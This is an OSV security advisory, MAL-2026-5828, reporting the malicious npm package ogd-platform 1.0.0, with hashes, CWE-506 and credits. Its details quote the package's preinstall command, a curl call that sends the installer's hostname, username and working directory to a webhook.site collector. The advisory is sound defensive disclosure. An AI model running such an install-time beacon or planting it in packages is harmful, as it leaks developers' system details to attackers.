MAL-2026-5828

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ogd-platform/MAL-2026-5828.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5828

Published

2026-06-15T20:08:22Z

Modified

2026-06-15T20:31:51.834131013Z

Summary

Malicious code in ogd-platform (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931)

The package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open Government Data Platform core'. On npm install, the preinstall hook runs curl --data-urlencode "info=$(hostname && whoami && pwd)" against a webhook.site collector URL, sending the installer's hostname, username, and current working directory to an attacker-controlled endpoint. The empty tarball plus recon beacon is the canonical dependency-confusion / namespace-squat reconnaissance shape: an internal build expecting a private ogd-platform package would resolve to this public registry entry and leak host identifiers to the attacker on install.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931",
            "source": "amazon-inspector",
            "modified_time": "2026-06-15T20:08:22Z",
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-006699",
            "import_time": "2026-06-15T20:14:29.144824987Z"
        }
    ]
}

References

https://www.npmjs.com/package/ogd-platform/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / ogd-platform

Package

Name: ogd-platform; View open source insights on deps.dev
Purl: pkg:npm/ogd-platform

Affected ranges

Affected versions

1.*

1.0.0

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ogd-platform/MAL-2026-5828.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "8e13479f1c02654262c93c30cdb8870a317387e31e5c06266e0c9302919bb10b",
            "tlsh": "c9d02b945734bb335add46b31ad6a028d7349f4f84849c1e6ec2112452565e1349f37b",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-YbZgnNGlIru4anZXAR2KnDVHeXIypPq67VhxfEFj/FTGI4QSqSGFcx5KpMyebADUR4AewTq87VJBhBWngwU4Xg==",
                "sha1": "90e93782b00f9d30ed0e1bf2b305fd6a55c6f5e0"
            },
            "filename": "ogd-platform-1.0.0.tgz"
        }
    ]
}